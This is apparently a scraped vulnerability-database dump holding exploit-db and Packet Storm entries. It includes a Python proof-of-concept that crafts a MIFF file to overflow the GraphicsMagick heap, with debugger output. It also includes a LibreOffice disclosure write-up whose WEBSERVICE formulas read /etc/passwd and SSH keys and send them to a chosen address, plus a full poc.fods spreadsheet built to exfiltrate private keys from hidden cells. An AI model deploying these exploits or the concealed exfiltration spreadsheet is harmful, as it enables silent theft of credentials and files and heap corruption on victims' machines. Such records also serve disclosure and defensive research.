{\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}], "packetstorm": [{"lastseen": "2018-02-15T00:22:34", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-08T00:00:00", "published": "2018-02-08T00:00:00", "href": "https://packetstormsecurity.com/files/146319/LibreOffice-Arbitrary-File-Disclosure.html", "id": "PACKETSTORM:146319", "type": "packetstorm", "title": "LibreOffice Arbitrary File Disclosure", "sourceData": "`Hello, \n \nAfter I know that the reported vulnerability was already known to developers, \nbut they did not include trivial fix to 6.0, but (as the developer said, I did \nnot check it byself) include to 5.4.5 (it means this is a silent fixed \nvulnerability) with a month lag between updates I think it's more correct to \nfull disclose it. \n \nPoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure \n \n# Vulnerability description \n \n## First part \n \nLibreOffice supports COM.MICROSOFT.WEBSERVICE function: \n \nhttps://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 \n \nThe function is required to obtain data by URL, usually used as: \n \n=FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\") \n \nIn original: \n \nFor protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value. \n \nIn LibreOffice, these restrictions are not implemented. \n \n## Second part \n \nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document. \n \n# Exploitation \n \nTo read file you need just: \n \n=WEBSERVICE(\"/etc/passwd\") \n \nThis function can also be used to send a file: \n \n=WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\")) \n \nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path. \n \n=MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\", \n \nAlso you can parse other files too, like a ~/.ssh/config or something like that. \n \nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works). \n \n# Impact \n \nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO. \n \n \n \npoc.fods: \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n \n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\"> \n<office:automatic-styles> \n<style:style style:name=\"co1\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/> \n</style:style> \n<style:style style:name=\"co2\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/> \n</style:style> \n<style:style style:name=\"co3\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/> \n</style:style> \n<style:style style:name=\"co4\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/> \n</style:style> \n<style:style style:name=\"co5\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/> \n</style:style> \n<style:style style:name=\"co6\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/> \n</style:style> \n<style:style style:name=\"ro1\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ro2\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/> \n</style:style> \n<style:style style:name=\"ro3\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\"> \n<style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/> \n</style:style> \n<style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/> \n<style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:text-properties style:use-window-font-color=\"true\"/> \n</style:style> \n<style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:table-cell-properties fo:background-color=\"#f3715a\"/> \n</style:style> \n<style:page-layout style:name=\"pm1\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/> \n</style:footer-style> \n</style:page-layout> \n<style:page-layout style:name=\"pm2\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> \n</style:header-footer-properties> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> \n</style:header-footer-properties> \n</style:footer-style> \n</style:page-layout> \n</office:automatic-styles> \n<office:body> \n<office:spreadsheet> \n<table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/> \n<table:table table:name=\"Sheet1\" table:style-name=\"ta1\"> \n<table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"8\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell table:number-columns-repeated=\"9\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro2\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Current user:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\"> \n<text:p>689</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\"> \n<text:p>676</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell/> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>http://localhost:8080</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro3\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>List of private keys:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\"/> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Send:</text:p> \n</table:table-cell> \n<table:table-cell/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>0 (default path)</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"5\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\"> \n<text:p>1</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\"> \n<text:p>132</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\"> \n<text:p>109</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\"> \n<text:p>96</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\"> \n<text:p>2</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\"> \n<text:p>297</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\"> \n<text:p>259</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\"> \n<text:p>246</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\"> \n<text:p>3</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\"> \n<text:p>436</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\"> \n<text:p>409</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\"> \n<text:p>396</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\"> \n<text:p>4</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\"> \n<text:p>586</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\"> \n<text:p>563</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\"> \n<text:p>550</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\"> \n<text:p>5</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\"> \n<text:p>718</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\"> \n<text:p>695</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\"> \n<text:p>682</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\"> \n<text:p>6</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\"> \n<text:p>882</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\"> \n<text:p>860</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\"> \n<text:p>847</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\"> \n<text:p>7</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\"> \n<text:p>1267</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\"> \n<text:p>1240</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\"> \n<text:p>1227</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\"> \n<text:p>8</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\"> \n<text:p>1408</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\"> \n<text:p>1383</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\"> \n<text:p>1370</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\"> \n<text:p>9</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n</table:table> \n<table:named-expressions/> \n</office:spreadsheet> \n</office:body> \n</office:document> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146319/libreoffice-disclose.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. \n \nGraphicsMagick is aThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeleras SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.a \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: 